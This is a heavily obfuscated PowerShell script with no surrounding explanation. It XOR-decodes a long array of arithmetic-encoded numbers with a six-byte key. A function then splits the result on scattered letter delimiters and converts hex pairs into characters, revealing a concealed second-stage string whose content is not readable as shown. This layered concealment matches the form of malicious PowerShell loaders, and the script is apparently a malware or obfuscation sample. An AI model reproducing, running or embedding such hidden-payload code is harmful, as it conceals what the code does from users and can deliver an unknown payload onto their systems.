$oUCnUdL =[ iNt[]]( ( 95 -72),( 65 - 32), ( 9+91),( 19- 12),(34 - 13),(29 +83),(30 -11), ( 11 +21),( 93- 9), ( 57 -50), ( 49- 29), (11+111), (81-63), ( 95-63),(25+ 19), (84-78),( 63 +5),(80 + 32), (58 -40),(29 + 4), (87+6),( 38- 36),( 96 -73),(59+16),( 41 - 19),(86 +27), (97 + 4),(51-49), (39-16),(88 - 37),(89-66),( 6 + 33),(64+3),(7- 2), (42 - 12),(67 -16),( 74 - 55),( 64 +51), (12 +32), ( 25-18),( 15 +3),(57+ 18), ( 52-29),(67-33), (80+ 31),( 65- 58), ( 46-25),(43+ 8), ( 21- 2), ( 60 -28),( 12+83), (82- 80), ( 42-19),(9+ 55),(90 -72), (51-18), ( 92 +9),( 65- 59),( 22+ 9), (56 + 38),( 79 - 61),(30+9), ( 70 + 23), (93 - 87), ( 67 -2), (52+70), (20-2),(80 - 46), (72 + 23),( 55- 49),(89 - 59),(59+5),(32 - 13), ( 98+14), ( 16 + 79), (33 - 27), ( 25- 9), ( 93+ 19), (33-10),(91 -54),( 5+ 93),(84 - 78),(42 -20),( 75 +47), ( 2+16),(96-62), (99 - 1),( 23- 17), ( 20+ 2), ( 2+110),( 24 -6),( 22+22),(32+33),(84 - 82), ( 41-18), ( 19+45), ( 45 - 26),(4+41),( 87+ 13),( 27- 21),( 18 + 4), (1 + 50),( 76 -58), (75 -38),(38 +73),(26 -19), (80- 57),( 21 +54), (55 -36), ( 4+40), (0+ 65),(11- 5),( 88- 22), (12+52), ( 33- 14),( 64-32),(53+42),(92 -85), (68 - 48), ( 37+85), ( 48-30), (69-31),(15+ 50),( 87- 85),( 70- 47), ( 59 +33),( 84- 66),( 14+20),( 77 - 33), (29- 23),( 35 -5),(36 +76),(53 - 35), (99 - 66), (70- 3), (74 -68),( 83- 52), (81+ 41),(18 +5),( 91 - 54), (76 + 22),( 87-81),( 5+16),(79 + 44),19, (20+ 95),(89+9),(19 -12),(0 + 19), (45+ 47), ( 84 - 65), (88-43),(23+44), ( 19 - 17),( 81 - 58),( 71+ 4), ( 52-33),( 15 +30), ( 33+ 60), ( 99- 93),( 79 - 57),(99 +23), ( 71- 52), ( 27+85), ( 81- 37),(71- 65),( 91- 72),( 3 + 109), ( 19 -1), (48 - 10), ( 98- 14),( 72 - 70), (11+57), ( 60 + 62),( 67- 44), ( 90- 53),( 78 + 33), (24-18), (58 - 36), (54+ 58),( 7 + 12), (39 +73), (74 + 19), (86-80),( 86-67),(90- 26),( 72 -49),( 18+19),( 72 - 7),( 13 - 6), ( 49 -28),(59 -8), (49-30),(50 -18),( 12+83),( 1+ 5), (2+20), ( 1+93), (35 - 16), ( 67 - 29),( 67+ 44),(14- 8),(22 + 9), (34+ 78), ( 97-78),( 9 +35), (27+ 17), (1 +5), (47 +19), (19+ 106), ( 52-33), ( 5+29), ( 26+74), ( 13-11), ( 62-39), ( 97 +15),( 65-46),( 82 + 33), (21+63),( 6 +1),( 4+14),( 49 +76),(52- 34),( 84 - 51),( 74- 7), ( 61 - 59),(15+ 8),( 35+88),(73-54), (75-40),(34 + 66),( 92 -86), (45+20), (61+64), ( 87-69),( 2 + 37),( 36+ 75),( 74-72), (0+ 23),( 21 + 104),(96 -78), (42-4),( 25 +59), ( 49 -43),(47 +18),(31+33),(20- 1),( 76 +37), (79+ 19),( 59 -53), (16+ 2), ( 36+56), ( 13 + 5),( 30+3),( 21+77),( 97 - 91),( 91 -60), (41+ 34), 19, ( 24 +20), (46+49),(33 -27),( 55 + 11),(14+ 52), ( 88- 69), ( 11+23),( 46+ 47),(31-29), ( 47 - 24),(58 + 54), ( 35- 17), ( 74 -41),(62+3), ( 41 -35),( 32-1), (72 -8),(44-25),( 88- 52), ( 8 +36), (25- 18), (33-14), ( 80 + 32), (6+17), (42 - 5),93, (10- 3),(18- 2),(79+ 33),(91-72), (58-14), (87-22),( 42 -36), (58 + 10),(50+ 25),( 67 - 48), (32+86),( 34+50), ( 40- 38), (8 +15), ( 22+29), ( 46- 27), (35+ 77), (100 -35),(90- 84),(39- 21), (92 -26), ( 23 - 5),(70 -35),( 53+45), ( 64-58), (97-79), (84+ 38), (7 +11), ( 52- 13), ( 97 - 32),( 3 - 1),( 13 + 10),(4 +62), ( 29 - 10),( 84+29), (19 + 65), ( 45- 39),(41- 19), ( 42+ 24),( 50-31),(7+ 112), (89 +9), (89-83),(33-15), ( 0+ 122), (83- 60),( 7+ 30), (32+69),(38 -31),( 19 +11),( 10 +113), (37-18), ( 90 +25),(35 + 9),(81 - 74),( 55 -37), (13 + 110), ( 21 + 2), ( 0+37), ( 89 + 6),( 14 - 8),( 53- 22), ( 88 -37), (100- 81), ( 95 -59),(20+80),(48 -41),( 97-74), (38 + 13),( 16 +2), ( 58-21),( 89+6),( 31- 24), ( 61 -31),(45+ 30),( 61 - 38), ( 5+ 107), ( 46 + 55), (46 -40), (20 +10), (30+82), (21- 3), (33 + 4),(98- 14), (52 -49),(56 +14), ( 96 -45),(77- 55), ( 73-34),(70 +41),(23 -20), ( 92-69),(60+34), (25- 3), (90- 46), ( 3 + 108), ( 24 -22), (68 - 2),( 42+24), (38 - 16),( 82 -43),( 60 + 38),(65- 62), ( 34 -11), (59-8), ( 13+ 9),(79 - 44), ( 19+76), (88 - 86), (57+ 9),( 71- 5),(51- 29), (90 - 54), ( 66 + 45),(1 +2),(49- 28),( 46+66), (36- 14), ( 2+ 42), ( 35 + 66), (31 -29), (42 + 24),( 72 +3),( 33- 11),( 88- 44), ( 66+27), ( 44- 42), (79- 58), (48 + 46), ( 54 +14))
$lICbAg= @((51 - 14), ( 52- 31), (61-48),( 68-20),( 13+26),(44- 26))
$UUpmI= @() 
FOr($i = 0; $i-lt $oUCnUdL.leNgTh; $i++) {$UUpmI += $oUCnUdL[$i] -bxor  $lICbAg[ ($i % $lICbAg.length)]}
$UUpmI = ([cHAr []]$UUpmI )-jOIN ''
fUNCtIoN SgMeCoaJ { 
    [cMDletBIndiNG()]Param( 
        [PARamETER (ValuefROmpIPeLInE)]
        $ccgEv
    )
    $MNgBRVc= ( $ccgEv -spLiT'!'-sPLIT 'i'-SpLiT 'N'-sPLIt'R'-SpLIt'h'-sPLiT 'o'-SPlIT 'L'-SpLit 'P' -SPliT 'b' -sPlit 'Y' |FOReACH-ObjeCT { ( [cHAr]([conveRT]::toINt16( ( $_.ToSTrING() ),16) ))} )-jOIN''
}
$UUpmI|SgMeCoaJ

